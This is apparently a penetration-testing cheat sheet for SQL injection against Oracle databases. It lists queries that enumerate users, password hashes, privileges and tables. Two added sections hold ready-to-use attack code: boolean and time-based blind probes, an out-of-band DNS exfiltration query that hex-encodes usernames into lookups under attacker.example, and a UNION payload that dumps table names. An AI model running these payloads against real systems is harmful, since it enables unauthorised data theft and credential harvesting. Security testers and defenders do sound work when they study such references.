
pentestmonkey

Taking the monkey work out of pentesting

Oracle SQL Injection Cheat Sheet


Some useful syntax reminders for SQL Injection into Oracle databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.

The complete list of SQL Injection Cheat Sheets I'm working on is:

  Oracle
  MSSQL
  MySQL
  PostgreSQL
  Ingres
  DB2
  Informix

I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version
  SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
  SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
  SELECT version FROM v$instance;

Comments
  SELECT 1 FROM dual -- comment
  SELECT 1 /* comment */ FROM dual
  -- NB: SELECT statements must have a FROM clause in Oracle, so we have to use the dummy table 'dual' when we're not actually selecting from a table.

Current User
  SELECT user FROM dual;

List Users
  SELECT username FROM all_users ORDER BY username;
  SELECT name FROM sys.user$; -- priv

List Password Hashes
  SELECT name, password, astatus FROM sys.user$; -- priv, <= 10g. astatus tells you if the account is locked
  SELECT name, spare4 FROM sys.user$; -- priv, 11g and later: spare4 holds the case-sensitive verifiers ('S:' SHA-1; 12c adds a 'T:' SHA-512 one), and the password column keeps the legacy DES hash only while the 10g verifier is still stored

Password Cracker
  checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.

List Privileges
  SELECT * FROM session_privs; -- current privs
  SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
  SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
  SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; -- priv

List DBA Accounts
  SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles
  -- NB: ADMIN_OPTION = 'YES' really lists grantees who may grant a system privilege onward, which is typical of DBAs but not the same thing. For holders of the DBA role itself:
  SELECT grantee FROM dba_role_privs WHERE granted_role = 'DBA'; -- priv

Current Database
  SELECT global_name FROM global_name;
  SELECT name FROM v$database;
  SELECT instance_name FROM v$instance;
  SELECT SYS.DATABASE_NAME FROM DUAL;

List Databases
  SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user). An instance serves a single database, so schemas are the nearest equivalent of "databases" on other backends
  -- Also query the TNS listener for other databases. See tnscmd (services | status).

List Columns
  SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
  SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';

List Tables
  SELECT table_name FROM all_tables;
  SELECT owner, table_name FROM all_tables;

Find Tables From Column Name
  SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case. Unquoted identifiers are stored in upper case, so match owner, table and column names in upper case too

Select Nth Row
  SELECT username FROM (SELECT ROWNUM r, username FROM (SELECT username FROM all_users ORDER BY username)) WHERE r=9; -- gets 9th row (rows numbered from 1)
  -- NB: ROWNUM is assigned before ORDER BY is applied, so the ORDER BY has to sit in its own inner query. SELECT ROWNUM r, username FROM all_users ORDER BY username numbers the rows in whatever order they were fetched and only then sorts them, so r=9 is not the 9th name alphabetically.

Select Nth Char
  SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'

Bitwise AND
  SELECT bitand(6,2) FROM dual; -- returns 2
  SELECT bitand(6,1) FROM dual; -- returns 0

ASCII Value -> Char
  SELECT chr(65) FROM dual; -- returns A

Char -> ASCII Value
  SELECT ascii('A') FROM dual; -- returns 65

Casting
  SELECT CAST(1 AS char) FROM dual;
  SELECT CAST('1' AS int) FROM dual;

String Concatenation
  SELECT 'A' || 'B' FROM dual; -- returns AB

If Statement
  BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- PL/SQL, so it doesn't play well with SELECT statements

Case Statement
  SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
  SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2

Avoiding Quotes
  SELECT chr(65) || chr(66) FROM dual; -- returns AB

Time Delay
  BEGIN DBMS_LOCK.SLEEP(5); END; -- priv (needs EXECUTE on DBMS_LOCK), can't seem to embed this in a SELECT
  -- NB: from 18c DBMS_SESSION.SLEEP does the same and is granted to PUBLIC, but it is still a PL/SQL procedure, not something you can call from a SELECT
  SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
  SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
  SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow
  -- NB: on 11g and later UTL_INADDR, UTL_HTTP and UTL_TCP are governed by network ACLs; a user without one gets ORA-24247 immediately rather than a delay
  -- Also see Heavy Queries to create a time delay

Make DNS Requests
  SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
  SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;

Command Execution
  Java can be used to execute commands if it's installed. ExtProc can sometimes be used too, though it normally failed for me.

Local File Access
  UTL_FILE can sometimes be used. Check that the following is non-null:
  SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
  -- NB: utl_file_dir was deprecated in 12.2 and desupported from 18c; on those releases UTL_FILE only works through directory objects:
  SELECT directory_name, directory_path FROM all_directories;
  Java can be used to read and write files if it's installed (it is not available in Oracle Express).

Hostname, IP Address
  SELECT UTL_INADDR.get_host_name FROM dual;
  SELECT host_name FROM v$instance;
  SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
  SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames

Location of DB files
  SELECT name FROM V$DATAFILE;

Default/System Databases
  SYSTEM
  SYSAUX
  -- NB: strictly these are tablespaces rather than databases; an Oracle instance serves one database
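The following is an added worked example written for this edit; it is not code from the original pentestmonkey post. It combines the Nth-row, substr/ascii, CASE and UTL_INADDR entries from the table above into a boolean-based probe, a time-based probe and an out-of-band DNS exfiltration query, and goes slightly beyond the table by putting extracted data into the looked-up name. The 9th row of all_users, the 'SYSTEM' account and the zone attacker.example are assumptions for illustration; on 11g and later every UTL_INADDR call here needs a network ACL or it fails with ORA-24247 before any lookup happens.

```sql
-- Added example (not from the original post). Assumptions: attacker.example is
-- a DNS zone whose authoritative server the tester controls; the target value
-- is the 9th username in all_users sorted alphabetically.

-- 1. Pick the Nth row reliably. ROWNUM is assigned before ORDER BY, so the sort
--    has to be in its own inner query and ROWNUM applied one level out.
SELECT username
FROM (
  SELECT ROWNUM r, username
  FROM (SELECT username FROM all_users ORDER BY username)
)
WHERE r = 9;

-- 2. Boolean-based probe: returns 1 when the first character of that username
--    sorts above 'M' (ASCII 77), else 0. The client walks the character
--    position and the ASCII threshold (binary search, about 7 probes per
--    character) and reads the answer from the page's true/false behaviour.
SELECT CASE
         WHEN ascii(substr(
                (SELECT username
                 FROM (SELECT ROWNUM r, username
                       FROM (SELECT username FROM all_users ORDER BY username))
                 WHERE r = 9), 1, 1)) > 77
         THEN 1 ELSE 0
       END AS probe
FROM dual;

-- 3. Time-based probe for pages that show no visible difference. No PL/SQL and
--    no EXECUTE on DBMS_LOCK needed: the slow path is a forward lookup of a
--    name under a zone whose server deliberately never answers, so the delay
--    is the resolver timeout. The lookup eventually raises ORA-29257, but the
--    delay has already happened by then, which is the only signal needed.
SELECT CASE
         WHEN (SELECT count(*) FROM all_users WHERE username = 'SYSTEM') = 1
         THEN UTL_INADDR.get_host_address('slow.attacker.example')
         ELSE 'x'
       END AS probe
FROM dual;

-- 4. Out-of-band exfiltration: carry the value in the hostname so the
--    authoritative server for attacker.example logs it, one value per lookup.
--    Hex-encoding keeps the label DNS-safe whatever the value contains
--    (usernames such as XS$NULL would otherwise break the name), and substr()
--    keeps it inside the 63-byte label limit. The query may still end in
--    ORA-29257, but the request has left the database before that.
SELECT UTL_INADDR.get_host_address(
         substr(rawtohex(utl_raw.cast_to_raw(
           (SELECT username
            FROM (SELECT ROWNUM r, username
                  FROM (SELECT username FROM all_users ORDER BY username))
            WHERE r = 9))), 1, 63)
         || '.attacker.example')
FROM dual;
```

When the injection point sits inside a string literal, each of these goes in as a subquery, e.g. `' OR (probe query) = 1 --`, with the closing quote and the rest of the original statement commented out; the `chr()` trick from the Avoiding Quotes row replaces the literals if quotes are filtered.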

Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.

From Christian Mehlmauer:

Get all table names from all_tables in one string (when using union based SQLI with only one row)
  select rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()'), ',') from all_tables

Blind SQLI in order by clause
  order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = 'a' and rownum = 1)=1) then column_name1 else column_name2 end -- you must know 2 column names with the same datatype
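An added example, not part of the original post or of the reader tip above, showing the single-row UNION case in context. The vulnerable statement, its column types and the products table are assumptions for illustration. It uses LISTAGG, which exists from 11g Release 2; on older releases the xmlagg() form above is the way to get the same one-string result.

```sql
-- Added example (not from the original post). Assumed vulnerable statement:
--   SELECT id, name, price FROM products WHERE name = '<input>'
-- with id and price NUMBER, name VARCHAR2, and a page that renders only
-- the first row returned.

-- Injected input (everything after the application's opening quote). The
-- UNION row must match the original column count, and NULL pads the numeric
-- columns so no type mismatch (ORA-01790) is raised. The data goes into the
-- one column the page renders.
' UNION SELECT NULL,
  (SELECT LISTAGG(owner || '.' || table_name, ',')
            WITHIN GROUP (ORDER BY owner, table_name)
   FROM all_tables WHERE ROWNUM <= 200),
  NULL FROM dual--

-- Statement the server ends up executing (the trailing quote is commented out):
SELECT id, name, price FROM products WHERE name = ''
UNION SELECT NULL,
  (SELECT LISTAGG(owner || '.' || table_name, ',')
            WITHIN GROUP (ORDER BY owner, table_name)
   FROM all_tables WHERE ROWNUM <= 200),
  NULL FROM dual--'

-- LISTAGG returns VARCHAR2 and raises ORA-01489 once the concatenated result
-- exceeds 4000 bytes, hence the ROWNUM cap; page through with
-- "WHERE ROWNUM <= 400 MINUS ... ROWNUM <= 200" style subqueries, or on 12.2
-- and later use LISTAGG(... ON OVERFLOW TRUNCATE) to get a truncated string
-- instead of an error.
```

The same padding rule applies to every column: the UNION branch must line up with the original SELECT list, so count columns first (ORDER BY n until it errors, or UNION SELECT NULL,NULL,... until it stops erroring) before placing the aggregated string.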

Tags: cheatsheet, database, oracle, pentest, sqlinjection

Posted in SQL Injection
